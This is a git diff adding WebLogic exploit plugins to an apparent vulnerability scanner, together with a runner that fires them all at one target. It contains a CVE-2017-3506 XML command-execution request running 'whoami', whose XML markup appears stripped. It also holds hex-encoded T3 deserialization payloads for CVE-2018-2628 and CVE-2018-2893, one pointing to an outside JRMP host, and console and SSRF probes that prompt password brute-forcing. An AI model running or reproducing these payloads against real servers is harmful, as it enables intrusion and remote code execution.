0000000..1b2fc62 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2017_3506.py @@ -0,0 +1,72 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import requests +import re +from sys import argv + +heads = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', + 'Content-Type': 'text/xml;charset=UTF-8' + } + +def poc(url): + if not url.startswith("http"): + url = "http://" + url + if "/" in url: + url += '/wls-wsat/CoordinatorPortType' + post_str = ''' + + + + + + + + /bin/bash + + + -c + + + whoami + + + + + + + + + + ''' + + try: + response = requests.post(url, data=post_str, verify=False, timeout=5, headers=heads) + response = response.text + response = re.search(r"\.*\<\/faultstring\>", response).group(0) + except Exception as e: + response = "" + + if 'java.lang.ProcessBuilder' in response or "0" in response: + result = '[+]目标weblogic存在JAVA反序列化漏洞:CVE-2017-3506' + return result + else: + result = '[-]目标weblogic未检测到CVE-2017-3506' + return result +def run(rip,rport): + url=rip+':'+str(rport) + result = poc(url=url) + print(result) + +if __name__ == '__main__': + run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2628.py b/plugins/weblogic_poc/CVE_2018_2628.py new file mode 100644 index 0000000..1f7c360 --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2628.py @@ -0,0 +1,80 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import sys +import time +import re + + +VUL=['CVE-2018-2628'] +PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078'] +VER_SIG=['\\$Proxy[0-9]+'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + sock.recv(1024) + # print 'handshake successful' + +def buildT3RequestObject(sock,dport): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + # print 'send request payload successful,recv length:%d'%(len(sock.recv(2048))) + + +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + # print 'rs',rs + checkVul(rs,server_addr,index) + + +if __name__=="__main__": + dip = sys.argv[1] + dport = int(sys.argv[2]) + run(dip,dport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/CVE_2018_2893.py b/plugins/weblogic_poc/CVE_2018_2893.py new file mode 100644 index 0000000..04a978a --- /dev/null +++ b/plugins/weblogic_poc/CVE_2018_2893.py @@ -0,0 +1,85 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import socket +import time +import re +import sys + +VUL=['CVE-2018-2893'] + +PAYLOAD=['ACED0005737200257765626C6F6769632E6A6D732E636F6D6D6F6E2E53747265616D4D657373616765496D706C6B88DE4D93CBD45D0C00007872001F7765626C6F6769632E6A6D732E636F6D6D6F6E2E4D657373616765496D706C69126161D04DF1420C000078707A000001251E200000000000000100000118ACED0005737D00000001001A6A6176612E726D692E72656769737472792E5265676973747279787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372002D6A6176612E726D692E7365727665722E52656D6F74654F626A656374496E766F636174696F6E48616E646C657200000000000000020200007872001C6A6176612E726D692E7365727665722E52656D6F74654F626A656374D361B4910C61331E03000078707732000A556E696361737452656600093132372E302E302E310000F1440000000046911FD80000000000000000000000000000007878'] + +VER_SIG=['StreamMessageImpl'] + +def t3handshake(sock,server_addr): + sock.connect(server_addr) + sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) + time.sleep(1) + data = sock.recv(1024) + + +def buildT3RequestObject(sock,port): + data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' + data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(port)) + data3 = '1a7727000d3234322e323134' + data4 = '2e312e32353461863d1d0000000078' + for d in [data1,data2,data3,data4]: + sock.send(d.decode('hex')) + time.sleep(2) + + + +def sendEvilObjData(sock,data): + payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' + payload+=data + payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' + payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) + sock.send(payload.decode('hex')) + time.sleep(2) + sock.send(payload.decode('hex')) + res = '' + try: + while True: + res += sock.recv(4096) + time.sleep(0.1) + except Exception as e: + pass + return res + +def checkVul(res,server_addr,index): + p=re.findall(VER_SIG[index], res, re.S) + if len(p)>0: + # print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index]) + print(('[+]目标weblogic存在JAVA反序列化漏洞:{}'.format(VUL[index]))) + else: + # print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index]) + # pass + # print (u'目标weblogic未检测到:{}'.format(VUL[index])) + print(('[-]目标weblogic未检测到{}'.format(VUL[index]))) + +def run(dip,dport,index): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + ##打了补丁之后,会阻塞,所以设置超时时间,默认15s,根据情况自己调整 + sock.settimeout(10) + server_addr = (dip, dport) + t3handshake(sock,server_addr) + buildT3RequestObject(sock,dport) + rs=sendEvilObjData(sock,PAYLOAD[index]) + #print 'rs',rs + checkVul(rs,server_addr,index) + +if __name__=="__main__": + # dip = sys.argv[1] + # dport = int(sys.argv[2]) + # run(dip,dport,0) + rip = '127.0.0.1' + rport = 7001 + run(rip,rport,0) \ No newline at end of file diff --git a/plugins/weblogic_poc/__init__.py b/plugins/weblogic_poc/__init__.py new file mode 100644 index 0000000..f021474 --- /dev/null +++ b/plugins/weblogic_poc/__init__.py @@ -0,0 +1,10 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' diff --git a/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc new file mode 100644 index 0000000..0a165d6 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc new file mode 100644 index 0000000..e769ce2 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc new file mode 100644 index 0000000..fff3108 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc new file mode 100644 index 0000000..60e9e01 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc new file mode 100644 index 0000000..e9debdf Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc new file mode 100644 index 0000000..043f80f Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc new file mode 100644 index 0000000..a3dc485 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..e71ff90 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc new file mode 100644 index 0000000..62b4765 Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc b/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc new file mode 100644 index 0000000..76e62ca Binary files /dev/null and b/plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc differ diff --git a/plugins/weblogic_poc/managerURL200.py b/plugins/weblogic_poc/managerURL200.py new file mode 100644 index 0000000..7530763 --- /dev/null +++ b/plugins/weblogic_poc/managerURL200.py @@ -0,0 +1,32 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import sys +import requests + +headers = {'user-agent': 'ceshi/0.0.1'} + +def islive(ur,port): + url='http://' + str(ur)+':'+str(port)+'/console/login/LoginForm.jsp' + r = requests.get(url, headers=headers) + return r.status_code + +def run(url,port): + if islive(url,port)==200: + u='http://' + str(url)+':'+str(port)+'/console/login/LoginForm.jsp' + print(("[+]目标weblogic控制台地址暴露!\n[+]路径为:{}\n[+]请自行尝试弱口令爆破!".format(u))) + else: + print("[-]目标weblogic控制台地址未找到!") + +if __name__=="__main__": + url = sys.argv[1] + port = int(sys.argv[2]) + run(url,port) + # run('127.0.0.1',7001) \ No newline at end of file diff --git a/plugins/weblogic_poc/uddi_ssrf.py b/plugins/weblogic_poc/uddi_ssrf.py new file mode 100644 index 0000000..282bbcb --- /dev/null +++ b/plugins/weblogic_poc/uddi_ssrf.py @@ -0,0 +1,31 @@ +#!/usr/bin/env python +# _*_ coding:utf-8 _*_ +''' + ____ _ _ _ _ __ __ _ +| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __ +| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ / +| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ < +|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ + +''' +import sys +import requests + +headers = {'user-agent': 'ceshi/0.0.1'} + +def islive(ur,port): + url='http://' + str(ur)+':'+str(port)+'/uddiexplorer/' + r = requests.get(url, headers=headers) + # print(url,r.status_code) + return r.status_code + +def run(url,port): + if islive(url,port)==200: + print(('[+]目标weblogic存在UDDI组件!\n[+]路径为:{}\n[+]请自行验证SSRF漏洞!'.format('http://' + str(url)+':'+str(port)+'/uddiexplorer/'))) + else: + print("[-]目标weblogic UDDI组件默认路径不存在!") + +if __name__=="__main__": + url = sys.argv[1] + port = int(sys.argv[2]) + run(url,port) \ No newline at end of file diff --git a/plugins/weblogic_special_plugin_.py b/plugins/weblogic_special_plugin_.py new file mode 100644 index 0000000..81dfa86 --- /dev/null +++ b/plugins/weblogic_special_plugin_.py @@ -0,0 +1,51 @@ +#coding=utf-8 +from plugins.weblogic_poc import CVE_2015_4852 +from plugins.weblogic_poc import CVE_2016_0638 +from plugins.weblogic_poc import CVE_2016_3510 +from plugins.weblogic_poc import CVE_2017_3248 +from plugins.weblogic_poc import CVE_2017_3506 +from plugins.weblogic_poc import CVE_2018_2628 +from plugins.weblogic_poc import CVE_2018_2893 +from plugins.weblogic_poc import managerURL200 +from plugins.weblogic_poc import uddi_ssrf +import socket +def weblogic_special_plugin_(arg,config): + port=7001 + ip=socket.gethostbyname(arg.url.strip("http://").strip("https://")) + #print(arg.url) + try: + CVE_2015_4852.run(ip,port) + except Exception: + print("CVE_2015_4852 脚本出错") + try: + CVE_2016_0638.run(ip,port,0) + except Exception: + print("CVE_2016_0638 脚本出错") + try: + CVE_2016_3510.run(ip,port,0) + except Exception: + print("CVE_2016_3510 脚本出错") + try: + CVE_2017_3248.run(ip,port,0) + except Exception: + print("CVE_2017_3248 脚本出错") + try: + CVE_2017_3506.run(ip,port) + except Exception: + print("CVE_2017_3506 脚本出错") + try: + CVE_2018_2893.run(ip,port,0) + except Exception: + print("CVE_2018_2893 脚本出错") + try: + CVE_2018_2628.run(ip,port,0) + except Exception: + print("CVE_2018_2628 脚本出错") + try: + managerURL200.run(ip,port) + except Exception: + print("managerURL200 脚本出错") + try: + uddi_ssrf.run(ip,port) + except Exception: + print("uddi_ssrf 脚本出错") \ No newline at end of file